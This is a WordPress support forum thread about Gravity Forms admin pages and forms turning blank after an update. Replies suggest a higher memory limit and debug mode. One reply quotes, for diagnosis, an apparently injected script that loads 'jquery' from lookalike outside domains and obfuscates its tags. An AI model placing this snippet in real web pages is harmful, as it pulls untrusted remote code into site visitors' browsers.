Gravity Forms nothing but White Pages after Update!

  1. I cant access settings, or the actual form itself on my site! http://www.ReputationAssured.com

    It looks like a lot of people are having this issue. Perhaps an issue with jQuery loading twice?

    Any idea when we will have a fix for this? It is losing me customers!

    Thanks so much in advance,
    Will

  2. I don't know about the admin, but it appears the form is working on the front end just fine. I tested in a couple of browsers.

    Are you still having problems viewing the admin and form?

  3. Sorry, I should have specified. The form I am trying to access is viewed by clicked the "Get a Free Report" button on the front page of the site. It is in a Modal. It was working fine before this update, but is now giving me a blank screen (as the settings area is)

    Thanks for the quick reply...I appreciate it.

    I can't seem to get the link (in footer) to do anything on my iPad - just as a heads up. Doesnt go to a new page or show a popup.

  5. Not sure, if this could be related:

    <script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.j-query.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.j-query.org/jquery.js"></scr'+'ipt>'); } </script><script type="text/javascript" src="http://ehint.net/jquery/jquery.min.js"></script>

    That is outside of your doctype and when I clicked the button, my browser was showing a "waiting for http://www.j-query.org..." That could be the issue?

    This seems like an appropriate place to add my experience.
    I have a dev license and uploaded the latest version today for the first time ever on this particular website.

    Everything seems to go ok but when I try to get to any of the admin pages all I get is a white screen.

    So if there are any further updates on this situation I will be watching.
    The site is running the latest version of wp and there are no plugin conficts that I can see.

    I am happy to provide a developer with access to both my cpanel and wordpress if they email me with some contact details.

    Regards Ron

    I had opened a thread earlier with this issue... but I am also experiencing the white screen on admin since yesterday after the latest update.

  8. I am glad this is a problem multiple people are having and not just me.

    Robb, I am not sure where you are getting that script from or how I would go about fixing it, but I assume that it is an issue with j-Query trying to run twice through different plugins then? Why would this only happen after the update? How can I go about fixing it?

    Thanks a lot for your help.

  10. I fixed the issue by increasing the default memory limit (32mb) in wp-config

    define('WP_MEMORY_LIMIT', '64M');

  11. I will try that LoriKB, Thanks. Wish we could get some admin help, seems like a major issue...

  12. Blank screens are usually caused by an error. You can see the error by turning On debugging on your wp-config.php file.

    define('WP_DEBUG', true);

    I will be glad to take a closer look at your site and help figure out what is causing this. If you would like me to do that, please send me an admin login to your WP dashboard as well as an FTP login to alex@rocketgenius.com

    Cheers,
    Alex
